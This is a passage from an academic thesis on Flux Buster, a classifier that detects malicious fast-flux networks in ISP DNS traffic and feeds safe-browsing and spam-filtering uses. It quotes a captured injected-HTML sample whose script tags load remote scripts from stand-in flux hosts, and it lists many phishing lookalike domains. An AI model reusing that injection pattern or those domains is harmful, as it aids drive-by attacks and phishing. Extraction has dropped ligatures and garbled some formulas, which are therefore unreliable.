domains resolved to during an epoch E. Since lters F1 and F2 adopt a conservative
approach and may not be able to lter out domains related to legitimate CDNs or
other legitimate Internet services (e.g., pools of NTP servers) that have a behavior
somewhat similar to ux services, after collecting and clustering the candidate ux
domains we need to determine which clusters are actually related to malicious ux
services and which ones are related to legitimate and non-ux networks. To this
end, we apply a statistical supervised learning approach to build a network classi-
er which can automatically distinguish between malicious ux services and other
networks, as shown in Figure 3.4.
We rst describe and motivate the set of statistical features we use to
distinguish between malicious ux services and legitimate/non-ux services.
In [Passerini et al. (2008)], Passerini et al. proposed a thorough characterization of
fast-ux domain names in terms of statistical features for supervised learning. They
introduced a set of nine features based on the analysis of the set of IP addresses
resolved by querying single domain names. In this work we adapt some of the fea-
tures proposed in [Passerini et al. (2008)] to characterize clusters of domain names
(as oppose to single domains) related to malicious ux services, and we introduce
some additional new features. We divided our feature set into two groups, namely
passive features and active features. We call passive those features that can be
directly extracted from the information collected by passively monitoring the DNS
queries from our RDNS sensors. On the other hand, active features need some
additional external information to be computed (e.g., information extracted from
whois queries, geolocation mapping of IP addresses, BGP announcement data, etc.).
For each cluster of domains obtained as described in Section 3.2.4, and related to
the epoch Em , we compute the following statistical features:
Passive Features
φ1 Number of resolved IPs. This is the overall number of distinct resolved IP addresses ever
observed during epoch Em for all the domains in a cluster. Malicious ux services typically
use a large number of ux agents to provide load balancing and high availability of malicious
content, and therefore feature φ1 will typically have a high value.
φ2 Number of domains. This is the total number of distinct domain names in a cluster. As
mentioned above, some malicious ux services are advertised through large sets of fast-ux
domains. This is often the case when the ux operator tries to avoid domain blacklisting
by registering and advertising new random-looking domains every day.
φ3 Avg. TTL per domain. Average TTL of domains in a cluster. Flux domains are cong-
ured with a low TTL to force RDNS servers to frequently ush their cache and query the
authoritative DNS server for an updated list of resolved IPs. This way, the resolved IPs of
ux domains are frequently changed to reect changes in the set of active ux agents.
φ4 Network prex diversity This is the ratio between the number of distinct /16 network
prexes and the total number of IPs. This feature is used to estimate the degree of scattering
3.2. Flux Buster 37
of IP addresses among dierent networks, and represents a reasonable approximation of

active features φ7 and φ8 (explained below).
φ5 Number of domains per network. Number of distinct domain names that resolved to
at least one of the IP addresses in the considered cluster, during all the previous epochs
E1 , E2 , ... until the considered epoch Em . In spite of the high variability of ux domain
names, ux networks are rather stable and persistent [Konte et al. (2009)]. Thus, the same
ux agents will be used by so many distinct domain names, during the time. This feature
measures how many domains can be associated to the IPs (i.e., the ux agents) in a cluster,
throughout dierent epochs.
φ6 IP Growth Ratio. This represents the average number of new IP addresses discovered per
P |R(d) |
each DNS response related to any domain in a cluster. Namely, |C | ·
1
d∈C Q(d) . The
i i
higher this value, the higher the probability that the response to a new DNS query for a
domain d ∈ Ci will contain a set of new (never-seen-before) IPs, and therefore the higher
the probability that d is associated to a ux service.
Active Features
φ7 Autonomous System (AS) diversity, φ8 BGP prex diversity, φ9 Organization di-

versity. We measure the ratio between the number of distinct ASs where the IPs of a
cluster reside and the total number of resolved IPs. Also, we compute the ratio between the
number of distinct organization names the IPs belong to (notice that an organization may
announce multiple ASs) and the number of IPs in the cluster, and the ratio between the
number of distinct BGP prexes the IPs in the cluster belong to, and the total number of
IPs in the cluster.
φ10 Country Code diversity. For each IP in a cluster, we map it to its geographical location
and compute the ratio between the number of distinct countries across which the IPs are
scattered and the total number of IPs. We expect high values of this feature for ux
networks, since ux agents are typically located in many dierent countries.
φ11 Dynamic IP ratio. The bot-compromised machines that constitute malicious ux services
are mostly home-user machines. In order to estimate whether an IP is related to a home-
user machine, we perform a reverse (type PTR) DNS lookup for each IP, and we look for
keyworks such as dhcp, dsl, dial-up, etc., in the DNS response to identify machines that
use a dynamic (as opposed to static) IP address. We then compute the ratio between the
(estimated) number of dynamic IPs in the cluster and the total number of IPs. The intu-
ition is that, contrary to malicious ux services, the vast majority of legitimate CDNs and
other Internet services rely on professionally managed machines having static IP addresses.
Therefore feature φ11 can help us distinguishing between malicious ux services and other
services.
φ12 Average Uptime Index. This feature is obtained by actively probing each IP in a cluster
about six times a day for a predened number of days (e.g. 5 days), and attempting to
4
establish TCP connections on ports 80/53/443, i.e., HTTP/DNS/HTTPS services . If the
host accepts to establish the TCP connection, it is considered up, otherwise it is considered
down. An estimate of the uptime of each IP is given by the ratio between number of times
the IP is found to be up versus the total number of probes. Feature φ12 is computed as the
average uptime for the IPs in a cluster.
4
We use TCP instead of UDP for DNS probing, because most o-the-shelf DNS software are
designed to listen on port 53 for both TCP and UDP communications.
Features φ2 , φ4 , φ5 , φ6 , φ11 and φ12 constitute an original contribution of this

work, compared to [Passerini et al. (2008)] and other previous work on detecting
ux services, and allowed us to achieve a very high classication accuracy. In Sec-
tion 3.3 we analyze in detail the eectiveness of the feature set described above for
distinguishing between malicious ux services, legitimate CDNs, and other legiti-
mate or non-ux services in general.
After measuring the features described above, we employ the popular C4.5
decision-tree classier [Quinlan (1993)] to automatically classify a cluster Ci as
either malicious ux service or legitimate/non-ux service. The reasons for us-
ing a decision-tree classier are as follows: a) decision-trees are ecient and have
been shown to be accurate in a variety of classication tasks; b) the decision-tree
built during training can be easily interpreted to determine what are the most dis-
criminant features that allow us to distinguish between malicious ux services and
legitimate/non-ux services; c) the C4.5 is able to automatically prune the features
that are not useful, and potentially create noise instead of increasing classication
accuracy [Quinlan (1993)]. We rst train the C4.5 classier on a training dataset
containing a number of labeled clusters related to malicious ux services and clus-
ters related to legitimate/non-ux services. Afterwards, the classier can be used
online to classify the clusters obtained at the end of each epoch E from the data
collected at each RDNS sensor, as shown in Figure 3.4. The details of how we
obtained the labeled training dataset of malicious ux and legitimate clusters and
estimated the accuracy of our network classier are reported in Section 3.3.
3.3 Experiments
In this Section we present the results obtained with our malicious ux network detec-
tion system. All the experiments related to the clustering of candidate ux domains
and classication of ux service networks were conducted on a 4-core 3GHz Intel
Xeon Machine with 16GB or memory. However, because the machine was shared
with other research applications, we constrained ourselves to using a maximum of
5GB for our experiments.
3.3.1 Collecting Recursive DNS Trac

Using the data collection architecture shown in Figure 3.3, we placed two trac
sensors in front of two dierent RDNS servers of a large north American Internet
Service Provider (ISP). These two sensors monitored the RDNS trac coming from
users located in the north-eastern and north-central United States, respectively.
Overall, the sensors monitored the live RDNS trac generated by more than 4
million users for a period of 45 days, between March 1 and April 14, 2009. During
this period, we observed an average of about 1.3 billion DNS queries of type A and
CNAME per sensor, as shown in Figure 3.7(a). Overall we monitored over 2.5 billion
DNS queries per day related to hundreds of millions of distinct domain names.
The trac collected at each sensor is reduced using lters F1 and F2, as shown
3.3. Experiments 39
in Figure 3.4 and described in Section 3.2. We set the epoch E to be one day.
Figure 3.7 shows the number of candidate ux domains obtained at the end of each
epoch. It is easy to see that the overwhelming trac volume monitored by the
RDNS sensors is eectively reduced from more than 109 DNS queries for tens of
millions of distinct domain names, to an average of 4 · 104 to 6 · 104 candidate ux
domain names per day (depending on the sensor we consider).
3.3.2 Clustering Candidate Flux Domains

At the end of each epoch, the candidate ux domains extracted by the RDNS
sensors are transfered to our Detector machine (see Figure 3.3), where they undergo
a clustering process.
Once ltering is completed, we apply a single-linkage hierarchical clustering algo-

rithm [Jain et al. (1988), Jain et al. (1999)] to group together domains that belong
to the same network, as described in Section 3.2.4. After transfering the data col-
lected from the RDNS sensors to our detection system, the time needed for the
clustering process was around 30 to 40 minutes per day and per each sensor. The
hight of the dendrogram cut was chosen to be h = 0.6. This choice is motivated by
the fact that we want to cut the dendrogram at an height within the largest plateau
region (see Section 3.2.4). In particular, by plotting the cluster analysis graphs
reported in Figure 3.5 and Figure 3.6 for dierent days, we noticed that the value
h = 0.6 (on the x-axes) was always located around the end of the largest plateau
region and provided high quality clusters. Using h = 0.6 we obtained an average of
about 4,000 domain clusters per day.
Clustering is a completely unsupervised process [Jain et al. (1988),

Jain et al. (1999)], and automatically verifying the results is usually very hard if
at all possible. Therefore, with the help of a graphical interface we developed, we
manually veried the quality of the results for a subset of the clusters obtained
every day. In particular, in order to assess the quality of the domain clusters,
we manually veried that the domain names in a clusters were actually related
to the same service (e.g., the same CDN, the same malicious ux network, the
same NTP pool, etc.). In many cases this manual evaluation was straightforward.
For example, our clustering algorithm was able to correctly identify clusters of
domain names belonging to a malicious ux service that was being used for
phishing facebook login credentials, for example. In this case the ux domain
names all shared very strong structural similarities because they all started with
login.facebook, contained a string of the form personalid-RAND, where RAND
is a pseudo random string, and ended with .com. Also, our IP-based clustering
process (see Section 3.2.4) was able to correctly group together domain names
related to the NTP server pool in Europe and separate them from the group of
domains related to the NTP pool in North America, the pool of domains related
to Oceania, etc. The domain names related to the NTP pools in dierent regions
of the world can visually be distinguished from each other. Therefore, it was
easy to verify that domains such as 0.europe.pool.ntp.org, uk.pool.ntp.org,
fr.pool.ntp.org were all correctly grouped together, and separated from the
cluster containing au.pool.ntp.org and oceania.pool.ntp.org, for example. In
other cases we had to conrm the correctness of our clusters by manually probing
the clustered domain names and nding relations between the obtained resolved
IPs and the services (e.g., web pages) provided through them. Figures 3.8 and 3.9
show a snapshot of our graphical interface, showing a malicious ux network and a
legitimate ntp pool, respectively.
3.3.3 Evaluation of the Service Classier

In this section we explain the results related to the classication of clusters of do-
mains into either malicious ux services or legitimate/non-ux services. As de-
scribed in Section 3.2.5, we use a statistical supervised learning approach to build
a service classier. In order to use a supervised learning approach, we rst need
to generated a dataset of labeled clusters (the ground-truth) which can be used
to train our statistical classier, and evaluate its classication accuracy. We rst
describe how this labeled dataset was generated, and then motivate why the dierent
statistical features used by the classier, and described in detail in Section 3.2.5,
allow us to accurately detect malicious ux service networks.
In order to construct the labeled dataset for our experiments, we manually in-
spected and labeled a fairly large number of clusters of domains generated by the
clustering process described in Section 3.2.4. To make the labeling process less time
consuming, we developed a graphical interface that allows us to rank clusters of
domains according to dierent features. For example, our interface allows us to
rank all the clusters according to their network prex diversity (feature φ4 ), the
cumulative number of distinct resolved IPs (feature φ1 ), the IP growth ratio (fea-
ture φ6 ), etc. In addition, our graphical interface allows us to inspect several other
properties of the clusters, such as CNAME entries collected from DNS responses,
the content of Web pages obtained by contacting a sample of resolved IPs from a
cluster, information gathered from queries to whois and search engines, etc. Also,
for each cluster we compute a cluster nickname by selecting a domain name among
those whose second level domain
5 (2LD) is the most frequent in the cluster.
Table 3.1 shows an example of 4 clusters related to legitimate services and 3

clusters related to malicious ux service networks, and reports for each cluster the
value of the passive statistical features described in Section 3.2.5. All clusters
are related to domains passively collected from DNS traces using our two RDNS
sensors. Cluster l1 and l2 represent typical legitimate CDNs, l3 is related to the
European pool of NTP servers [NTPpool], whereas l4 is related to the OASIS infras-
tructure [OASIS]. On the other hand, clusters m1 , m2 , and m3 represent 3 dierent
examples of malicious ux networks. In particular m1 consists of 466 dierent do-
main names that serve the very same adult content, m2 consists of 3 domains that
serve PayPal phising webpages, and m3 consists of 269 domains that run the same
5
The second level domain (2LD) of a domain name d is dened as the last two substrings
separated by a dot. For example the 2LD of www.example.com is example.com
3.3. Experiments 41
Cluster ID Cluster Nickname Use Label

l1 cdne.gearsofwar.xbox.com CDN Legitimate
l2 fotf.cdnetworks.net CDN Legitimate
l3 3.europe.ntp.org NTP pool Legitimate
l4 opendht.nyuld.net OASIS Legitimate
m1 50b0f40526956b85.saidthesestory.com Adult Content/Malware Malicious Flux
m2 paypal.database-confirmation.com Phishing Malicious Flux
m3 hqdvrp.flagacai.com Pharmacy Scam Malicious Flux
Passive features l1 l2 l3 l4 m1 m2 m3
Number of resolved IPs (φ1 ) 25 22 1069 346 765 137 1011
Number of domains (φ2 ) 12 24 15 13 466 3 269
Avg. TTL per domain (φ3 ) 22 20 1402 7421 300 180 180
Network prex diversity (φ4 ) 0.12 0.5 0.53 0.483 0.81 0.84 0.445
Number of domains per network (φ5 ) 488 165 57 54 42000 228 1632
IP Growth Ratio (φ6 ) 0.028 0.016 0.039 0.021 0.932 0.374 0.56
Active features l1 l2 l3 l4 m1 m2 m3
AS diversity (φ7 ) 0.04 0.364 0.383 0.396 0.25 0.5 0.193
BGP prex diversity (φ8 ) 0.12 0.68 0.562 0.485 0.77 0.8 0.43
Organization diversity (φ9 ) 0.04 0.364 0.382 0.393 0.23 0.47 0.186
Country Code diversity (φ10 ) 0.04 0.136 0.033 0.078 0.054 0.212 0.05
Dynamic IP ratio (φ11 ) 0 0 0.015 0 0.132 0.32 0.385
Average Uptime Index (φ12 ) 0.993 0.925 0.778 0.95 0.148 0.063 0.088
Table 3.1: Example of legitimate and malicious ux networks and their passive
and active feature values.
online pharmacy scam scheme. As we discussed in Section 3.2.5, we use the C4.5
decision tree classier to automatically classify between clusters of domains related
to malicious ux networks and clusters related to legitimate or non-ux networks.
We discuss the details of how we trained and tested our classier later in this section.
Here it is important to notice that one of the reasons we chose the C4.5 classier
is that the decision tree obtained after the training period is relatively easy to in-
terpret [Quinlan (1993)]. In particular, we noticed that when using the passive
features described in Section 3.2.5 for training, the classier indicated that the IP
Growth Ratio (feature φ6 ) is the most discriminant feature (i.e., the root of the de-
cision tree). It is easy to see that this is actually the case for the examples reported
in Table 3.1, where the malicious ux networks have a value of φ6 that is always
higher than the one computed for legitimate networks. This conrms the fact that
the rapid change of the resolved IPs of ux domains is a distinctive characteristic
of malicious ux service networks.
Since we focus on classifying malicious ux services, and considering that the
number of ux agents for each ux service network is usually very high, we only
consider clusters of domains for which overall we observed at least φ1 > 10 resolved
IPs. With the help of our graphical interface, during the entire month of March 2009
we were able to label 670 clusters as being related to malicious ux networks of var-
AUC DR FP
All Features 0.992 (0.003) 99.7% (0.36) 0.3% (0.36)
Passive Features 0.993 (0.005) 99.4% (0.53) 0.6% (0.53)
φ6 , φ3 , φ5 0.989 (0.006) 99.3% (0.49) 0.7% (0.49)
Table 3.2: Classication performance computed using 5-fold cross-validation.

AUC=Area Under the ROC Curve; DR=Detection Rate; FP=False Positive Rate.
The numbers between parenthesis represent the standard deviation of each measure.
ious kinds (e.g., ux networks serving malware, adult content, phishing websites,
etc.), and 8541 clusters related to non-ux/legitimate clusters, including clusters
related to dierent CDNs, NTP pools, IRC pools, and other legitimate services.
Using this labeled dataset and a 5-fold cross-validation approach, we evaluated the
accuracy of our classier. The obtained results are reported in Figure 3.2. It is easy
to see that our network classier is able to reach a very high Area Under the ROC
curve [Bradley (1997)], and a high detection rate and low false positive rate at the
same time. We performed experiments using three dierent sets of features. First,
we used all the passive and active features described in Section 3.2.5 to char-
acterize clusters of domains. Afterwards, we repeated the same experiments using
only the passive features (second row in Figure 3.2). From this last experiments,
the C4.5 learning algorithm generated a decision tree whose root was feature φ6 ,
and with feature φ3 and φ5 as children nodes at the top of the tree. This indicates
that these three features tend to be the most useful ones for distinguishing be-
tween malicious ux networks and legitimate networks. For the sake of comparison,
we evaluated the classication performance of our classier using only these three
features. As we can see from the third row in Figure 3.2, only three features are
sucient to obtain very good classication results, although using all the available
features produces slightly better results. Furthermore, we evaluated our classier in
an operational setting. Namely, we used the entire labeled dataset described above
to train our network classier, and then we used the obtained classier to classify
new (i.e., not seen during training) clusters of domains obtained in the rst 14 days
of April. During this period we obtained an average of 448 clusters per day (again,
considering only clusters for which φ1 > 10), 26 of which where classied as being
related to ux service networks. We manually veried that the classier correctly
labeled clusters related to malicious ux networks with very few false positives, thus
conrming the results reported in Figure 3.2. Overall, during the entire 45 days
period of evaluation, between March 1 and April 14, 2009, we detected an average
of 23 malicious ux service networks per day, with a total of 61,710 ux domain
names and 17,332 distinct IP addresses related to ux agents.
3.4. Applications 43
3.4 Applications
From March, 2009 up to now (February, 2010) Flux Buster is continuously detecting
(new) malicious fast ux networks. Furthermore, since July 2009, RDNS trac is
collected from two additional sensors in Italy and USA, respectively. Overall, from
March 2009 up to February 2010, we detected about 180,000 unique IP addresses
associated to ux agents. This value clearly states the relevance of the threat posed
by fast ux networks. Figure 3.11 shows the distribution of these ux agents among
6
dierent countries . It is easy to see that a substantial fraction of ux agents are
from USA, and this is in agreement with results from other fast ux detectors
(e.g. [Atlas, DNSBL]). Almost all ux networks are employed to support web-
based scams, from illegal adult websites to phishing scams involving high-prole
companies. Table 3.3 shows some examples of malicious fast ux networks. From
these examples, it is clear that these networks are employed for a wide range of
scams against web users. However, depending on the scam type, fast ux domains
may have dierent characteristics. In particular, we found that phishing websites
have a small time duration (e.g. few days), in spite of adult websites that may be
active for months. We speculate that this may be due to a relatively higher eort
of organizations (e.g. banks, governments) against phishing websites.
In any case, no legitimate websites are hosted by fast ux networks. If a website
is hosted by a ux network, it is very likely that is malicious and should be blocked.
Since this task is inherently dicult, in this Section we propose two client-side
security applications, supported by the output Flux Buster. Our goal is to prevent
users to retrieve malicious content hosted through malicious fast ux networks.
3.4.1 Safe browsing

The Google safebrowsing API is employed by most popular web browsers to check
websites against a blacklist of known malicious sites. In order to understand the
possible contribution of Flux Buster to the state-of-the-art protection of web users,
we veried what malicious ux domain names (detected by Flux Buster) are actually
noticed by the Google safebrowsing service. To this end, we employed the Google's
safebrowsing diagnostic tool http://www.google.com/safebrowsing/diagnostic?
site=google.com. Such a web interface allows a user to check a URL (or a domain
name) against a list of known-as-malicious websites. According to Google, this
diagnostic service maintains record of malicious websites for a maximum of 90 days.
Thus, we experimented on February, 2, 2010, with ux domain names detected in

the time interval November, 3, 2009 - February, 2, 2010. In such a period of time, we
identied 21,108 IP addresses of ux agents, and a total of 16,375 unique malicious
(ux) domain names. With the help of our validation interface we manually veried
that all these domains were actually associated to fast ux networks.
Figure 3.12 shows the number of websites which have been visited (in yellow) by
the Google safebrowsing engine. It is worth noting that out of 16,375 ux domain
6
The country has been obtained by means of the whois service of the Cymru team.
SCAM TYPE FAST FLUX DOMAIN NAMES

Adult Content 0711afafa7803d51.nugentcelticdonnell.com, 088683b12777d475.ghostsbarredrental.com,
08f15257a0ea7ee5.spreadnettingcleanly.com, 09ad518ad726e193.squadsvariousembryos.com,
09ae7f81efa7faa2.fraserlibraryshabby.com, 0a1a7c2792c461ed.nugentcelticdonnell.com,
0b53caa4e8a9edb5.fraserlibraryshabby.com, 0bc0dd7f7773c50c.nugentcelticdonnell.com,
0bfd3365dca2c45b.nugentcelticdonnell.com, 0c9328f675b1b931.ghostsbarredrental.com,
0d565d437fb5869d.ghostsbarredrental.com, 0d9d81f5e70761d2.squadsvariousembryos.com,
0dfde08e68ca8358.ghostsbarredrental.com, 0e294041c5d3d17c.developleftcity.com,
0e3fe6f42143105b.squadsvariousembryos.com, 0f255699977f3a81.ghostsbarredrental.com,
0fde9565dad27a33.nugentcelticdonnell.com, 100d83dcb74219a6.fraserlibraryshabby.com,
14cc04d937dd090f.fraserlibraryshabby.com, 163f3db2671f9703.fraserlibraryshabby.com,
189dda5b6c51569e.squadsvariousembryos.com, 18ad145ae37d4318.ghostsbarredrental.com,
191ab3abf627f482.nugentcelticdonnell.com, 1a3a25badc9819c5.nugentcelticdonnell.com [· · · many
more]
Facebook phishing facebook.shared.accessservlet.personalid-fbhmod8j9.processlogon.344session.com,
facebook.shared.accessservlet.personalid-kd0vb3bjj.ceptservlet.8345server.com,
facebook.shared.accessservlet.personalid-mct6meeyi.alternative.8345server.com,
facebook.shared.accessservlet.personalid-xm4f9y8xa.emberuiweb.344session.com,
facebook.shared.accountholder.personalid-0ip00okut.mixed.5435core.com,
facebook.shared.accountholder.personalid-3vj54osat.accountholder.344session.com,
facebook.shared.accountverify.personalid-4z37tsrz9.usermanage.344session.com,
facebook.shared.accountverify.personalid-sa3vts29i.serveronline.8345server.com [· · · many more]
Myspace phishing accounts.myspace.com.tteszk.org.uk, accounts.myspace.com.tteszk.me.uk,
accounts.myspace.com.tteszk.co.uk, accounts.myspace.com.tteszg.org.uk,
accounts.myspace.com.tteszg.me.uk, accounts.myspace.com.tteszg.co.uk, accounts.myspace.com.tteszf.co.uk,
accounts.myspace.com.ttesza.org.uk, accounts.myspace.com.ttesza.me.uk,
accounts.myspace.com.ttesza.co.uk, accounts.myspace.com.terhhoq.org.uk,
accounts.myspace.com.terhhoq.me.uk, accounts.myspace.com.terhhoq.co.uk,
accounts.myspace.com.terhhol.org.uk, accounts.myspace.com.terhhol.me.uk,
accounts.myspace.com.terhhol.eu, accounts.myspace.com.terhhol.co.uk, accounts.myspace.com.terhhok.org.uk,
accounts.myspace.com.terhhok.me.uk, accounts.myspace.com.terhhok.eu, accounts.myspace.com.iuuuujer.me.uk,
accounts.myspace.com.iuuuujer.eu, accounts.myspace.com.iuuuujer.co.uk,
accounts.myspace.com.iuuuujek.org.uk, accounts.myspace.com.iuuuujek.me.uk [· · · many more]
Ebay phishing cgi.ebay.com.fvdssrt.com, cgi.ebay.com.idservertff.net, cgi.ebay.com.idsrvtttr.com,
cgi.ebay.com.modefst10.mobi, cgi.ebay.com.msdrvffg.net, cgi.ebay.com.msdrvt1.bz,
cgi.ebay.com.msfddre.com, cgi.ebay.com.mtdfggs.com, cgi.ebay.com.sdlserverts.com,
cgi.ebay.com.trffdsl.com, cgi.ebay.com.vfrres.com, cgi.ebay.com.vsdfggg.net,
cgi.ebay.com.vvssldr.com, cgi.ebay.com.vvssldr.net, cgi.ebay.com.vzdfff1.com,
cgi.ebay.com.dllmsdrv.net
On-line pharmacy fiweixg.cn, fshioiwg.cn, fsieoowf.cn, galn.sfoioiiw.cn, gba.sdigwpd.cn, gdao.sfoioiiw.cn,
scam gdap.sdigwpd.cn, gdou.sdigwpd.cn, gdq.sfoioiiw.cn, gff.fsieoowf.cn, gfnt.fsieoowf.cn,
ggq.fieooief.cn, ggq.sdigwpd.cn, gguf.ssmmmwp.cn, gh.dipmmeig.cn, gib.fsieoowf.cn, gib.igemmpi.cn,
giew.igemmpi.cn, gii.fsieoowf.cn, gjhn.dipmmeig.cn, gkah.sdigwpd.cn, glhh.sfoioiiw.cn,
glqu.sfoioiiw.cn, gmb.sdigwpd.cn, gnum.sdigwpd.cn, gnvq.fshioiwg.cn, gpb.sdigwpd.cn,
gpq.fieooief.cn, gpwc.sdigwpd.cn, gqk.sfoioiiw.cn, grd.sfoioiiw.cn, grx.sfoioiiw.cn,
gsew.fieooief.cn, gsvg.fsieoowf.cn, gtf.dipmmeig.cn, gtr.dipmmeig.cn, gtse.fshioiwg.cn,
gudl.sfoioiiw.cn, guo.bssigrpi.cn, gvhd.sfoioiiw.cn, gvxl.fsieoowf.cn, gvy.fsieoowf.cn,
gwc.sfoioiiw.cn, gwgz.sdigwpd.cn, gwz.fshioiwg.cn [· · · many more]
Bank/IRS phishing chaseonline.chase.com.omersw.com, chaseonline.chase.com.omersr.net, chaseonline.chase.com.omersr.com,
chaseonline.chase.com.omersf.net, chaseonline.chase.com.omersf.com, chaseonline.chase.com.omersd.net,
chaseonline.chase.com.nyterdasq.net, chaseonline.chase.com.nyterdasq.com,
chaseonline.chase.com.omersx.net, chaseonline.chase.com.omersx.com, fwd.omersf.net,
chaseonline.chase.com.nyterdasp.net, 02fgu145501.cn, chaseonline.chase.com.nyterdasp.com,
chaseonline.chase.com.omersw.net, ger11zr.com, c.omersx.com, www.irs.gov.ger11zh.net,
www.irs.gov.yh1ferz.info, www.irs.gov.yh1ferz.com, www.irs.gov.ger11zr.com,
www.irs.gov.merfaslo.com, www.irs.gov.ger11zh.com, www.irs.gov.ger11zx.eu, gshipagc.com,
gshipagc.net, www.ger11zf.net, grph.omersf.net [· · · many more]
Table 3.3: Some examples of malicious networks detected by Flux Buster.

names, only 629 (3.8%) of them are related to analyzed websites. Among all ux
domain names which have been analyzed by Google safebrowsing, 87.3% (529) have
been recognized as malicious.
These results highlight some important characteristics of ux domain names.
First, it is clear that most of ux domain names are actually unknown to Google
(i.e. they are not related to websites analyzed by Google safebrowsing). As a con-
sequence, we speculate that most of ux domain names are advertized by webpages
not indexed by Google, or by means of non-web-based forms of advertisement. In
fact, during our experiments we came accross several compromised websites whose
injected HTML code was in the form:
<META NAME="ROBOTS" CONTENT="NOFOLLOW">

<script src=http://fast-flux-domain-name1/script.js>
<script src=http://fast-flux-domain-name2/script.js>
...
<script src=http://fast-flux-domain-nameN/script.js>
The META tag prevents search engines from indexing any link within the page. Then,
a list of links pointing to malicious scripts hosted through fast ux networks are
provided. Miscreants provide redundant links to the same script, by means of
dierent fast ux domain names. In such a way, the exploit works if any of these
domain names is active. Thus, the injected client-side exploit is aimed at forcing
the user's browser to fetch (and execute) malicious scripts and preventing search
engines from indexing the related links.
Our analysis evidences that most of websites related to fast ux domain names
analyzed by Google are recognized as malicious. However some of these are rec-
ognized as legitimate by Google safebrowsing. For example, this is the case of the
following ux domain names:
online.lloydstsb.co.uk.2z6ht9vcfl.com
online.lloydstsb.co.uk.3yjvl43o3a.com
online.lloydstsb.co.uk.5nfq2v9ph9.com
online.lloydstsb.co.uk.623hneczc1.com
online.lloydstsb.co.uk.g6eyxto9ri.com
It is easy to see that these malicious domains have been employed for a bank
phishing scam. Nevertheless, they are deemed as legitimate by Google. Figure 3.14
shows the Google safebrowsing's report on one of these fast ux domain names. We
obtained a similar result by checking fast ux domain names against the domain
blacklist of www.malwaredomains.com (see Figure 3.13). Malwaredomains' blacklist
is valuable since it is compiled from a variety of reliable sources [Likarish (2009)].
Nevertheless, only 715 fast ux domain names (4.4%) are actually recognized as
malicious. This highlights that the passive acquisition of RDNS query/replies on
large computer networks allows gaining a privileged observation standpoint.
Summarising, our study shows that Flux Buster may signal a relevant number of
malicious domain names which are not noticed by the Google safebrowsing blacklist
(on average, about 5250 domain names per month). The key point is that we
may detect such malicious domain names independently from the way they are
advertised. Besides this contribution, we may provide for a real time detection of
malicious domain names. A real time detection is fundamental to protect users
against phishing scams and spam emails. These aspects are studied in the following
section.
3.4.2 Spam Filtering

In this Section we analyze to what extent the information about malicious ux net-
works passively gathered at the RDNS level using our detection system can support
real time detection of malicious domain names. In particular, we focus on detecting
whether domain names found in spam emails are somehow related to malicious ux
networks detected by our system, as shown in the example of Figure 3.4.2. Assume
a mail server receives an email which contains a link to a certain website, performs
a DNS query for the domain name embedded in the link, and forwards the email
to the spam lter along with the obtained set, say Rf , of resolved IP addresses.
At this point the spam lter can inspect the content of the email, and also check if
there is any intersection between the set Rf and any of the malicious ux networks
identied by Flux Buster. If a signicant intersection (i.e., common IP addresses) is
found, the spam lter can increase the spam score related to the email, and use this
information for making a more accurate overall decision about whether the received
email should be classied as spam or not. The intuition is that if the domain name
of the website advertised through spam points to one or more previously detected
ux agents, it is very likely that the content of the advertised website is malicious.
A similar spam detection process may be used for types of spam dierent from
email spam. For example, using a browser plug-in this spam detection process may
be extended to identify blog spam, social network spam, etc., before the users access
the malicious content. Therefore, it is easy to see that the output of our malicious
ux detection system may contribute to a number of dierent spam ltering appli-
cations. Also, entreprises may set up their own Recursive DNS to identify malicious
domain names using this approach. For example, RDNS may provide users with the
set of resolved IPs only if a domain name is deemed legitimate. Otherwise, it may
just return the IP address of a local machine to prevent client-side applications from
loading malicious content from ux agents. This way, all employers and client-side
applications may be protected.
In order to measure to what extent our detection system may benet email spam
ltering, we proceeded as follows. We obtained a feed of URLs extracted from spam
emails captured by a mid-size email spam-trap during a period of 30 days, between
March 1 and March 30, 2009. This feed provided us with an average of 250,000 spam-
related URLs per day, from which we extracted about 86,000 new (i.e., never seen
before) domain names per day. Let Dk+1 be the set of spam-related domain names
(d)
collected on dayk + 1, Sk+1 be the set of resolved IPs obtained by performing one
DNS query for domain d ∈ Dk+1 , and R̂k−l be the overall set of IP addresses of ux
k
agents detected by our malicious ux network detection system in the period from
day k−l to day k . s(d) for domain d, we use
In order to obtain a suspiciousness score
(d)
the similarity metric dened in Equation 3.1 to compute s(d) = sim(Sk+1 , R̂kk−l ),
i.e., the degree of overlap between the resolved IPs of domain d and the malicious
ux networks we were able to detect from RDNS trac. If the value s(d) exceeds
a predened threshold θ , we classify the domain name d as malicious, otherwise
we classify it as legitimate. We repeat this process for each spam-related domain
name d ∈ Dk+1 to estimate the detection rate of the proposed approach, namely
the percentage of spam-related domain names that may be identied by a spam
lter. Furthermore, we considered the list of domain names related to the top
600,000 most popular web sites according to Alexa (www.alexa.com) to estimate
the false positives that may be generated by our detection approach. Let A be
the set of these popular websites. For each domain α ∈ A, we perform a DNS
query and collect the set resolved IP addresses R
(α) , and we compute the similarity
score s(α) = sim(R

(α) k
, R̂k−l ). Again, if s(α) > θ we classify α as malicious. In
our experiments, we assume the domain names in the set A are legitimate/non-
ux domains. Therefore, any domain α for which s(α) > θ is considered as a
false positive. Figure 3.4.2 reports the ROC curves (i.e., the trade-o between false
positive and detection rate) obtained by varying the detection threshold θ, using
a xed value of l = 2, and for four dierent value of k (i.e., four dierent days).
It is easy to see that the detection approach described above produces a detection
rate of domain names advertised through spam emails between 90% to 95%. It is
worth noting that not all of the detected malicious domains are necessarily fast-ux
domains. We noted that several of the domain names detected as malicious did not
appear to have a uxing behavior themselves, but resolved to a xed set of IP
addresses that partially intersected with the IP addresses of ux agents we detected
from our passive analysis of RDNS trac. A more detailed analysis revealed that
these xed sets of ux agents consisted of machines with a high average uptime.
Therefore, we speculate that highly reliable compromised machines may be used as
part of larger ux service networks, as well as stand-alone providers of malicious
content. It is also worth noting that the false positive rate of our approach for
detecting spam-related malicious domains is less than 0.002%. This conrms that
our proposed (real-time) approach to the detection of malicious domain names is
very promising and may substantially benet spam ltering applications and protect
web users.
3.4.3 Limitations, possible solutions and future work

In this Section, we discuss some limitations of the proposed approach to the detection
of fast ux networks. As pointed out in Section 2.4, it is important to identify
the limitations of security tools, in order to be able to cope with an adversarial
environment.
First and foremost, we may detect only fast ux domains which are resolved by
at least one user in the monitored networks. Thus, a reasonable statistical sample of
popular fast ux domains (and their resolved IPs) may be gained only if we collect
RDNS trac in large computer networks (as in our case). Thus, our approach may
be eective only if applied on large computer networks, such as those managed by
Internet Service Providers. This implies that ISP must collaborate and allow the
acquisition of RDNS trac.
